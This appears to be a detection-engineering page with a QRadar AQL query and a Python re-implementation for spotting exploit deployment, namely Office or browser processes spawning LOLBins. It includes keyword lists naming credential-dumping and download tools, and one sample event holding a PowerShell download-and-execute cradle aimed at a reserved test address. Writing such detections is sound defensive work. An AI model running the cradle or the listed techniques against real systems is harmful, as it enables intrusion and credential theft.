Detect Exploits in IBM QRadar
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find, modify, or purchase exploits from online sources, exploit vendors, criminal marketplaces (including exploit kits), or from other threat actors. Adversaries such as Ember Bear have obtained exploitation scripts against publicly-disclosed vulnerabilities from public repositories, while Kimsuky has obtained exploit code for various CVEs. Acquired exploits may be used across multiple phases of the adversary lifecycle including initial access, privilege escalation, defense evasion, credential access, and lateral movement. Because the acquisition of exploits occurs entirely on adversary-controlled infrastructure, direct detection is not possible from victim telemetry — detection must focus on observable indicators when those acquired exploits are deployed.
MITRE ATT&CK
- Tactic: Resource Development
- Technique: T1588 Obtain Capabilities
- Sub-technique: T1588.005 Exploits
- Canonical reference: https://attack.mitre.org/techniques/T1588/005/
QRadar Detection Query
SELECT
    DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS EventTime,
    LOGSOURCENAME(logsourceid) AS LogSource,
    devicehostname AS ComputerName,
    username AS UserName,
    "ParentImage" AS ExploitableParent,
    "ParentCommandLine" AS ParentCmdLine,
    "Image" AS SuspiciousChild,
    "CommandLine" AS ChildCmdLine,
    CASE WHEN "CommandLine" ILIKE '%http://%'
        OR "CommandLine" ILIKE '%https://%'
        OR "CommandLine" ILIKE '%ftp://%'
        OR "CommandLine" ILIKE '%invoke-webrequest%'
        OR "CommandLine" ILIKE '%net.webclient%'
        OR "CommandLine" ILIKE '%downloadstring%'
        OR "CommandLine" ILIKE '%downloadfile%'
        OR "CommandLine" ILIKE '%start-bitstransfer%'
        OR "CommandLine" ILIKE '%curl %'
        OR "CommandLine" ILIKE '%wget %'
        THEN 1 ELSE 0 END AS NetworkIndicator,
    CASE WHEN "CommandLine" ILIKE '%mimikatz%'
        OR "CommandLine" ILIKE '%sekurlsa%'
        OR "CommandLine" ILIKE '%lsass%'
        OR "CommandLine" ILIKE '%ntds%'
        OR "CommandLine" ILIKE '%procdump%'
        OR "CommandLine" ILIKE '%comsvcs%'
        OR "CommandLine" ILIKE '%minidump%'
        OR "CommandLine" ILIKE '%vaultcmd%'
        THEN 1 ELSE 0 END AS CredentialAccess,
    CASE WHEN "CommandLine" ILIKE '%schtasks%'
        OR "CommandLine" ILIKE '%reg add%'
        OR "CommandLine" ILIKE '%currentversion%run%'
        OR "CommandLine" ILIKE '%sc create%'
        OR "CommandLine" ILIKE '%sc config%'
        OR "CommandLine" ILIKE '%userinit%'
        THEN 1 ELSE 0 END AS PersistenceIndicator,
    CASE WHEN "CommandLine" ILIKE '%psexec%'
        OR "CommandLine" ILIKE '%wmiexec%'
        OR "CommandLine" ILIKE '%winrm%'
        OR "CommandLine" ILIKE '%net use%'
        OR "CommandLine" ILIKE '%enter-pssession%'
        OR "CommandLine" ILIKE '%invoke-command%'
        THEN 1 ELSE 0 END AS LateralMovement
FROM events
WHERE
    LOGSOURCETYPEID(logsourceid) = 396
    AND QIDNAME(qid) = 'Process Create'
    AND (
        "ParentImage" ILIKE '%\\winword.exe'
        OR "ParentImage" ILIKE '%\\excel.exe'
        OR "ParentImage" ILIKE '%\\powerpnt.exe'
        OR "ParentImage" ILIKE '%\\outlook.exe'
        OR "ParentImage" ILIKE '%\\mspub.exe'
        OR "ParentImage" ILIKE '%\\onenote.exe'
        OR "ParentImage" ILIKE '%\\msaccess.exe'
        OR "ParentImage" ILIKE '%\\acrord32.exe'
        OR "ParentImage" ILIKE '%\\acrobat.exe'
        OR "ParentImage" ILIKE '%\\chrome.exe'
        OR "ParentImage" ILIKE '%\\firefox.exe'
        OR "ParentImage" ILIKE '%\\msedge.exe'
        OR "ParentImage" ILIKE '%\\iexplore.exe'
        OR "ParentImage" ILIKE '%\\java.exe'
        OR "ParentImage" ILIKE '%\\javaw.exe'
        OR "ParentImage" ILIKE '%\\javaws.exe'
    )
    AND (
        "Image" ILIKE '%\\cmd.exe'
        OR "Image" ILIKE '%\\powershell.exe'
        OR "Image" ILIKE '%\\pwsh.exe'
        OR "Image" ILIKE '%\\wscript.exe'
        OR "Image" ILIKE '%\\cscript.exe'
        OR "Image" ILIKE '%\\mshta.exe'
        OR "Image" ILIKE '%\\rundll32.exe'
        OR "Image" ILIKE '%\\regsvr32.exe'
        OR "Image" ILIKE '%\\certutil.exe'
        OR "Image" ILIKE '%\\bitsadmin.exe'
        OR "Image" ILIKE '%\\msiexec.exe'
        OR "Image" ILIKE '%\\wmic.exe'
        OR "Image" ILIKE '%\\msbuild.exe'
        OR "Image" ILIKE '%\\installutil.exe'
        OR "Image" ILIKE '%\\regasm.exe'
        OR "Image" ILIKE '%\\regsvcs.exe'
        OR "Image" ILIKE '%\\schtasks.exe'
    )
    AND starttime > NOW() - 86400000
ORDER BY
    NetworkIndicator + CredentialAccess + PersistenceIndicator + LateralMovement DESC,
    starttime DESC

Detects deployment of acquired exploits (T1588.005) in QRadar via Sysmon Process Create events (EventID 1, LOGSOURCETYPEID 396). Queries the custom event properties populated by the Microsoft Windows Sysmon DSM for ParentImage and Image path matching against known exploitable applications and suspicious LOLBins. Computed scoring fields (NetworkIndicator, CredentialAccess, PersistenceIndicator, LateralMovement) surface post-exploitation intent within the spawned child process command line. Events are ordered by cumulative score descending to surface highest-confidence exploit deployments first.
Data Sources
Required Tables
False Positives & Tuning
- IT operations teams using Office macros to automate PowerShell-based patching, inventory, or configuration management workflows on managed endpoints
- PDF reader applications launching certutil.exe or msiexec.exe during plugin update installation or font package setup routines
- Browser-integrated enterprise single sign-on (SSO) helpers launching wscript.exe or cscript.exe to handle VBScript-based NTLM authentication prompts
- Automated testing frameworks (Selenium, Playwright headless) driven by chrome.exe or msedge.exe that spawn cmd.exe or PowerShell to execute test teardown scripts
- Java-based build servers (Jenkins, TeamCity agents) using javaw.exe as the parent that legitimately invoke msbuild.exe or msiexec.exe during CI pipeline execution
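The following is an added example, not code from the page or from QRadar: it re-implements the query's parent/child filter and four scoring CASE expressions in Python over constructed Sysmon Event ID 1 records, and adds a host-scoped allowlist that suppresses the Jenkins/javaw.exe -> msbuild.exe false positive listed above. The event dicts, host names and the ALLOWLIST entry are constructed assumptions; use it to dry-run tuning changes before editing the AQL.

```python
import fnmatch
import re

# Field names mirror the Sysmon DSM custom event properties the page's AQL query reads.
EVENTS = [  # constructed Sysmon Event ID 1 records, not real telemetry
    {"host": "ws01", "ParentImage": r"C:\Office16\WINWORD.EXE", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.1/a')"},
    {"host": "jenkins-agent-03", "ParentImage": r"C:\Java\bin\javaw.exe", "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": "MSBuild.exe build.proj /t:Package"},
    {"host": "ws02", "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c dir"},
]

EXPLOITABLE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe",
                       "chrome.exe", "firefox.exe", "msedge.exe", "java.exe", "javaw.exe"}
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                   "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe", "msbuild.exe"}

# The four CASE expressions of the query; '%' inside a pattern is the AQL LIKE wildcard.
INDICATORS = {
    "NetworkIndicator": ["http://", "https://", "ftp://", "invoke-webrequest", "net.webclient",
                         "downloadstring", "downloadfile", "start-bitstransfer", "curl ", "wget "],
    "CredentialAccess": ["mimikatz", "sekurlsa", "lsass", "ntds", "procdump", "comsvcs", "minidump", "vaultcmd"],
    "PersistenceIndicator": ["schtasks", "reg add", "currentversion%run", "sc create", "sc config", "userinit"],
    "LateralMovement": ["psexec", "wmiexec", "winrm", "net use", "enter-pssession", "invoke-command"],
}
# Tuning allowlist for the CI-server false positive listed above: (host glob, parent, child). Constructed.
ALLOWLIST = [("jenkins-agent-*", "javaw.exe", "msbuild.exe")]

def ilike(text, pattern):
    """Emulate AQL ILIKE '%pattern%': case-insensitive, '%' matches any run of characters."""
    return re.search(".*".join(map(re.escape, pattern.split("%"))), text, re.IGNORECASE) is not None

def score(event):
    """Return the four indicator flags plus their sum for one Process Create event."""
    flags = {name: int(any(ilike(event["CommandLine"], p) for p in pats)) for name, pats in INDICATORS.items()}
    return {**flags, "Total": sum(flags.values())}

def detect(events):
    """Apply the query's parent/child filter and the allowlist; return hits ordered by score, highest first."""
    hits = []
    for ev in events:
        parent, child = (ev[k].rsplit("\\", 1)[-1].lower() for k in ("ParentImage", "Image"))
        if parent not in EXPLOITABLE_PARENTS or child not in LOLBIN_CHILDREN:
            continue
        if any(fnmatch.fnmatch(ev["host"], h) and (parent, child) == (p, c) for h, p, c in ALLOWLIST):
            continue  # known-benign parent/child pair on this host class
        hits.append({"host": ev["host"], "parent": parent, "child": child, **score(ev)})
    return sorted(hits, key=lambda h: h["Total"], reverse=True)
```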
Testing Methodology
Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Simulate Document Exploit Process Chain (cmd Reconnaissance)
Expected signal: Sysmon Event ID 1: Process Create with Image=cmd.exe. CommandLine contains 'whoami', 'hostname', 'ipconfig', 'net user'. Security Event ID 4688 (with command line auditing enabled) records the same. When run from a Word macro, InitiatingProcessFileName=winword.exe triggers the detection's parent-child matching logic.
- Test 2: Simulate Browser Exploit Network Callback (Stage-2 Download Cradle)
Expected signal: Sysmon Event ID 1: Process Create for powershell.exe with CommandLine containing 'Net.WebClient', 'DownloadString', and the target URL. Sysmon Event ID 3: Network Connection attempt to 192.0.2.1:4444 (TEST-NET-1 per RFC 5737 — safe non-routable address that generates telemetry without reaching any real host). PowerShell ScriptBlock Log Event ID 4104 captures the full script content.
- Test 3: VBScript-Based Exploit Payload Simulation
Expected signal: Sysmon Event ID 1 (x2): First for powershell.exe creating the VBS file, second for wscript.exe executing it. The char()-based obfuscation in the VBS content mimics obfuscation patterns used in real exploit-delivered payloads. Sysmon Event ID 11: File Create event for the VBS file dropped to TEMP. PowerShell ScriptBlock Log Event ID 4104 for the PowerShell wrapper.
- Test 4: Exploit Guard ASR Rule Configuration Audit
Expected signal: PowerShell ScriptBlock Log Event ID 4104 for the MpPreference query. Informational output to file showing which ASR rules are active. When ASR rules are in block mode and a real Office application attempts to spawn a child process (e.g., via a macro), Windows Defender Operational log generates Event ID 1121 (Blocked) or Event ID 1122 (Audit) with the rule GUID and process details.
- Test 5: Simulate Post-Exploit Process Access (Sysmon Event ID 10)
Expected signal: Sysmon Event ID 10 (ProcessAccess): SourceImage=powershell.exe, TargetImage=notepad.exe, GrantedAccess=0x0410 (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ). Sysmon Event ID 1: powershell.exe process create. The 0x0410 access mask is characteristic of credential dumping tools and shellcode injection staging — many SIEM rules alert on this mask from non-system processes targeting sensitive processes.